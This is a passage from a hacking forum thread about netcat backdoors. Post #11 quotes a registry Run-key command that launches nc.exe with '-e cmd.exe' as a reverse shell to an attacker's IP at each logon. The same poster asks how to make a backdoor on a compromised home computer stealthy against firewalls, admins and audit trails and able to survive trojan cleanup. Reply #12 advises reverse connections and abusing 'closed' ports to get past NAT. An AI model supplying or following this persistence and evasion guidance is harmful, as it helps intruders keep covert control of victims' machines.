Page 2 of 2 FirstFirst 12
Results 11 to 12 of 12

Thread: NetCat - The Swiss Army Knife Share/Save - My123World.Com!

  1. #11
    Quote Originally Posted by D4rk357 View Post
    2. Executing the back door using a Registry Entry

    The back door would be triggered when the user logs on to the system.
    Add the registry key like following from command prompt:

    c:\ reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v -color: rgb(255, 255, 102);">netcat /t REG_SZ /d "c:\<path>\nc.exe -d <IP_for_reverse_connect> <remote_port> -e cmd.exe"

    As stated, the back door would be executed when some one logs into the system and you would leverage his "privilege", i.e. you could have a normal user privilege or of a administrator depending on the privilege of user logging in.

    Drawback: If shell has been lost, have to wait for the user to log-off and log-in again to trigger the back door connection.
    Hello everyone, this is my first post on this forum, I didn't consider myself a newbie until I came here

    Well, this is a newbish question to be honest, but I am working on a netcat 'backdoor' project to find the most stealthy and robust solution to a netcat backdoor on a host (a personal computer host, not a server).

    The context of this security issue is the attacker has already compromised the system via remote access and will leave a backdoor in the event their trojan is cleaned.

    So everyone knows the simple backdoor with netcat, but what are the main problems regarding the stealth and robustness of the solution?:

    1- There may be a lack of port forwarding from router to local host.
    2- The firewall protection may be extremely tight
    3- The computer may have a dynamic ip assigned every few days


    1- Manually open desired port prior to setting backdoor : problems : could be obvious to admin
    2- Add netcat to safe programs list (to avoid alert): problem :may not have admin rights to do this
    3- Install flexible DNS server like no-ip OR reverse connect : problem : starting to add to audit trail

    Can anyone help me here address these issues to produce the most stealthy and robust backdoor solution possible with netcat?

  2. #12
    ... I am no Expert b0nd's Avatar
    Join Date
    Jul 2010
    Location #g4h
    Hi Cheatson,

    The netcat scenario you have highlighted is for "reverse-connect" and bypasses all the issues highlighted by you.

    Regarding opening a new port - it might or might not help in case of direct-connect, as been stated by you, because of NATing and port forwarding issues. Here sometimes the luck favors if you find a "closed" port on server while performing port scanning from outside the network from cloud.
    Mind it, "closed" and "filtered" are quite different and you can simply run netcat on "closed" port, making it "open" and accessible from cloud without worrying about port forwarding and all as that has already been done by n/w admin for you while "mis-configuring" the network

    Feel free to discuss further if needed.

    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts